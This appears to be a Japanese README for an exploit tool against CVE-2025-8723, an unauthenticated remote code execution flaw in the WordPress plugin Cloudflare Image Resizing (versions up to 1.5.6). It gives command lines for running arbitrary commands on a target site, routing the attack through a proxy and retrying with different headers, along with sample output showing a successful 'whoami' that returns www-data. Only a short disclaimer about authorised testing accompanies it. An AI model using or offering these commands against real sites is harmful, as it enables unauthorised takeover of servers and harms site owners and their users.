
Cloudflare Image Resizing <= 1.5.6 | 未認証のリモートコード実行
WordPress用プラグイン Cloudflare Image Resizing(バージョン <= 1.5.6)には、認証欠如 の脆弱性が存在し、rest_pre_dispatch フックを介して 未認証リモートコード実行(RCE) が可能になります。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H説明:
このプラグインのREST APIエンドポイントはユーザー認証に失敗し、hook_rest_pre_dispatch()メソッド内で入力のサニタイズが不適切です。この欠陥により、攻撃者はログイン不要で悪意のあるリクエストを作成し、任意のPHPコードを注入・実行できます。
readme.txt ファイルの解析によるプラグイン脆弱性の自動検出whoami、ただし任意のコマンドを指定可能wp-content/plugins/cf-image-resizing/readme.txt を取得-c "id"--proxy を使用してプロキシ経由でリクエストを送信(例: BurpSuite)python3 CVE-2025-8723.py -u http://target.com/
whoamiカスタムコマンドを指定:
python3 CVE-2025-8723.py -u http://target.com/ -c "id"
プロキシを使用(例: BurpSuite):
python3 CVE-2025-8723.py -u http://target.com/ --proxy http://127.0.0.1:8080
高度なヘッダー試行回数を増やす(デフォルトは5):
python3 CVE-2025-8723.py -u http://target.com/ --attempts 10
[+] CVE-2025-8723 Exploit | by Khaled Alenazi (Nxploited)
[+] Detected version: 1.5.6
[+] Target is vulnerable (<=1.5.6). Proceeding with exploit.
[*] Trying minimal headers (only Content-Type)...
[=] Minimal Headers | Status: 200
www-data
[+] Exploit worked with this method!
このツールは、認可されたセキュリティテストおよび教育目的専用です。
開発者は、このコードによって引き起こされた誤用や損害について一切責任を負いません。
By: Khaled Alenazi (Nxploited)